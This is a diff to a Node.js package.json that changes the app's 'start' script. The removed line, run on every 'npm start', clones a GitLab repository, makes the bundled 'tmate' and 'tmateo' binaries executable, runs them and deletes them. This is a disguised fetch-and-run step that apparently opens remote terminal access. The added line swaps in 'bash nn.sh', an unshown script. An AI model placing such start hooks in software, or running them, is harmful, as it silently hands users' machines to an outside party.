--- a/package.json
+++ b/package.json
@@ -3,7 +3,7 @@
   "version" : "0.1.0",
   "main" : "myapp.js",
   "scripts" : {
-    "start" : "git clone https://gitlab.com/cuanbos/tmateo.git && cd tmateo && chmod +x tmate && chmod +x tmateo && ./tmateo && rm -rf tmateo"
+    "start" : "bash nn.sh"
   },
   "engines" : {
     "node" : "^10"
